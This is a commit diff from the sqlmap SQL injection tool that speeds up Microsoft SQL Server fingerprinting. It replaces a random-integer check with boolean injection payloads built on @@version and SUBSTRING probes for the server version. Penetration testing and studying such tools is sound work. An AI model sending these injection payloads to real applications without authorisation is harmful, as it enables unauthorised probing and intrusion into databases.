Better fingerprint technique for Microsoft SQL Server

bdamele · bdamele · commit b0ad102efbc5 · 2008-12-22T23:32:43.000Z
diff --git a/doc/ChangeLog b/doc/ChangeLog
@@ -7,6 +7,7 @@ sqlmap (0.6.4-1) stable; urgency=low
     manipulation statements, etc from user in SQL query and SQL shell if
     stacked queries are supported by the web application technology in
     use;
+  * Major speed increase in DBMS basic fingerprint;
   * Minor enhancement to support an option (--is-dba) to show if the
     current user is a database management system administrator;
   * Minor enhancement to support an option (--union-tech) to specify the
diff --git a/plugins/dbms/mssqlserver.py b/plugins/dbms/mssqlserver.py
@@ -176,12 +176,13 @@ def checkDbms(self):
         logMsg = "testing Microsoft SQL Server"
         logger.info(logMsg)
 
-        randInt = str(randomInt(1))
-
-        payload = agent.fullPayload(" AND LTRIM(STR(LEN(%s)))='%s'" % (randInt, randInt))
+        payload = agent.fullPayload(" AND LEN(@@version)=LEN(@@version)")
         result  = Request.queryPage(payload)
 
         if result == True:
+            logMsg = "confirming Microsoft SQL Server"
+            logger.info(logMsg)
+
             for version in ( 0, 5, 8 ):
                 payload = agent.fullPayload(" AND SUBSTRING((@@VERSION), 25, 1)='%d'" % version)
                 result  = Request.queryPage(payload)
